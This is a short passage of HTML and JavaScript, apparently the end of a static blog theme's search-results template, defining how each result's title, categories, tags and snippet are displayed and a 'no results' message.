href="http://localhost:4000{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
